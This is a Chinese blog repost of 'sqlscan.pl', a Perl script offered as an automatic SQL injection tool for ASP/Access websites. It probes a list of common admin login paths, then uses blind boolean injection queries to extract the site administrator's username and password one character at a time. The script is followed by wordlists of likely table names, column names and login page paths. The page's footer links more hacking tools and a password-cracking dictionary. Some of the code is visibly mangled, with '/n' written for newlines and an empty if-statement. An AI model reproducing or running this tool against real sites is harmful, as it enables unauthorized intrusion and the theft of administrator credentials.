ascc+asp自动注射代码,可以猜后台

原创 2004年08月31日 15:21:00
sqlscan.pl
Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD
#!/usr/bin/perl
#Codz By 黑嘿黑<cnhacker521@hotmail.com>2004/1/21.
#Thx MIX

$|=1;
use IO::Socket;

print "=======================================================================/n";
print " The sqlform-find Script Codz By 黑嘿黑<QQ:123230273> /n";
print " Our Team : www.cnse8.com /n";
print " My Home : xyhack.91i.net /n";
print "=======================================================================/n";
print "Usage: sql.exe 127.0.0.1 80 /test/wenxue/readarticle.asp?id=3 测试成功 /n";
print "-----------------------------------------------------------------------/n";

if ($#ARGV<1)
if ($#ARGV>1){
$host=$ARGV[0];
$port=$ARGV[1];
$way=$ARGV[2];
$judge=$ARGV[3];}

open(DB, 'sqlfrom.txt') || die "Can't open splfrom.txt.";
@Form = <DB>;
close (DB);
open(L, 'lines.txt') || die "Can't open lines.txt.";
@lines = <L>;
close (L);
open(LG, 'login.txt') || die "Can't open login.txt.";
@login = <LG>;
close (LG);

foreach $log (@login){
chomp $log;
@res=str1();
foreach $check (@res){
($http,$code,$blah) = split(/ /,$check);
if($code == 200){
print "Kaka !! Find the login: http://$host$way1$log/n";
}
}
}
foreach $sqlfrom (@Form){
chomp $sqlfrom;
$line="*";
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/nKaKa !! Find the sqlfrom is /U/a/a$sqlfrom/E: /n";
foreach $line1 (@lines){
chomp $line1;
$line=$line1;
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/a$line1/n";
}
}
}
}

print "/a/a/nInput the SQLForm of admin !/n$SQLForm=";$SQLForm=<STDIN>;chomp $SQLForm;
print "$id=";$ids=<STDIN>;chomp $ids;
print "$Username=";$usernames=<STDIN>;chomp $usernames;
print "$Password=";$passwords=<STDIN>;chomp $passwords;
print "/n/nNow , Start to Crack ! Please wait....../n/n";

#under here is SQL Words
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20$ids=";
$path2 =")";
$id = crackint();
print "/n/nSuccessful,The id of the first admin's id is /a$id ./n/n";

$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($passwords)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's password is /a$len ./n/n";

$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($passwords,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@password = crackchar();
print "/n/nSuccessful,The admin's password is /a/a@password ./n/n";

$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($usernames)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's name is $len ./n/n";

$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($usernames,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@username = crackchar();
print "/n/nSuccessful,The admin's username is /a/a@username ./n/n";

print "KaKa !! /a/a/you can use /nusername: @username/npassword: @password/nto login test !/r/n";


sub crackint {
@dic=(1..100);
for ($i=0;$i<@dic;$i++)
{
my $path=$path1.$dic[$i];
my $path=$path.$path2;
$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host: $host/n/n";
print "$dic[$i].";
sleep(1);
@in = sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
return $dic[$i];
last;
}
}
}


sub crackchar {
my $pws;
my @dic11=(0..9);
my @dic12=(a..z);
my @dic13=(A..Z);
my @special=qw(` ~ ! @ # $ %25 ^ %26 * /( /) _ %2b = - { } [ ] : " ; < > ? | , . / /);
my @special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? │ , 。 / 、 〈 〉 ');
my @dic=(@dic11,@dic12,@dic13,@special,@special2);
for ($j=1;$j<=$len;$j++)
{
for ($i=0;$i<@dic;$i++)
{
my $key=$pws.$dic[$i];
my $path=$path1.$j;
my $path=$path.$path2;
my $path=$path.$key;
my $path=$path.$path3;

$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host:$host/n/n";
print "$dic[$i].";
sleep(1);
@in =sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
$th=$j.th;
print "/nSuccessful,The $th word of the char is $dic[$i] /n";
$pws=$pws.$dic[$i];
last;
}
}
}

$pws=~s//%2b//+/ig;
$pws=~s//%25//%/ig;
$pws=~s//%26//&/ig;
return $pws;
}

sub str{
$path="%20and%20exists(select%20".$line."%20from%20$sqlfrom)";
$req = "GET $way$path HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}

sub str1{
@s=split(////,$way);
$s=@s;
$ss=@s[$i-1];
$d=length($ss);
$e=length($way);
$way1=substr($way,0,$e-$d);
$req = "GET $way1$log HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}

sub sock{
my ($req) = @_;
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host /n";

print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
sub usage {
print "/nInput the Host Info !/n$Host=";$host=<STDIN>;chomp $host;
print "$Port=";$port=<STDIN>;chomp $port;
print "$Way=";$way=<STDIN>;chomp $way;
print "/Input the Judge Words !/n$Judge=";$judge=<STDIN>;chomp $judge;
}


=================== end =============================
sqlfrom.txt:

admin
user
users
userinfo
admin_userinfo
password
adminuser
manboard
diaryuseruser
pwd
t_user
用户
管理员

lines.txt:

id
userid
username
usr
admin
name
user
userpwd
password
pwd
passwd
psword
pass
pws
pwa
user_id
user_name
user_pass
admin_id
admin_name
admin_pass
admin_password
u_id
u_name
u_password
auid
apwd
姓名
密码

login.txt:

pass.asp
password.asp
psd.asp
username/login.asp
username/admin.asp
denglu.asp
login/admin.asp
login/login.asp
admin_login.asp
login_admin.asp
userlogin.asp
User.Asp
user/login.asp
admin/admin.asp
admin/login.asp
admin.asp
login.htm
admin_login/admin.asp
login_admin/login_admin.asp
login.asp
admpast.asp
admin_login.asp
adminlogin.asp
manageNews/index.htm
Admin/admin_login.asp
admin_index.asp
adminn/index.asp
admin/adminlogin.asp
admin/default.asp
manage/login.asp

一个带后台的asp+Acess的企业网站源代码(已被我改为自己公司的了)

  • 2009年11月30日 00:43
  • 5.89MB
  • 下载

ascc+asp自动注射代码,可以猜后台

sqlscan.pl Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD #!/usr/bin/perl #Codz By 黑嘿黑2004/1/2...
  • 2195
  • 2195
  • 2004-08-31 15:21:00
  • 1085

网站后台登录地址大全

/admin/index.asp   /admin/login.asp   /admin/admin_login.asp   /manage/index.asp   /manage/login...
  • chance2015
  • chance2015
  • 2015-12-25 12:46:32
  • 4087

SQL语句 注入猜解hack工具

  • 2010年08月30日 16:25
  • 50KB
  • 下载

2010超级黑客工具包大全(菜鸟必备)

  • 2010年03月22日 21:05
  • 383KB
  • 下载

攻入网站后台的方法

45种攻入网站后台的方法 时间:2014-09-21 16:15:51      阅读:119130      评论:1      收藏:1      [点我收藏+] 标签:d...
  • hzp666
  • hzp666
  • 2017-04-05 09:41:30
  • 3967

赌博游戏源码(免费) <em>asp</em>

程序是商业程序,网上是找不到的 1.超级管理员<em>后台</em>登陆页面: adlogin.<em>asp</em> 用户....目前有游戏六个:赌 骰子 赌大小 赌21点 猜点数 石头剪刀布赌 老虎 机 11...
  • 2018年03月23日 00:00

最新网站后台密码破解字典

  • 2010年06月30日 10:18
  • 36KB
  • 下载

注射的一个完整代码

说明:下面代码是基本的注射,执行的代码在test_dll.dll里test_dll.dll在进程加载后重定位的PE镜像复制一个临时空间,然后FreeLibrary,再从临时空间把镜像复制到原空间,这样...
  • iiprogram
  • iiprogram
  • 2008-05-18 21:29:00
  • 875

asp.net中, 如何在后台获取访问这个页面的用户的名字?

 asp.net中, 如何在后台获取访问这个页面的用户的名字? 在集成安全认证下, 可以利用以下代码获取:System.Security.Principal.WindowsIdentity wi = ...
  • Terry001
  • Terry001
  • 2007-07-23 11:45:00
  • 819
收藏助手
不良信息举报
您举报文章:ascc+asp自动注射代码,可以猜后台
举报原因:
原因补充:

(最多只允许输入30个字)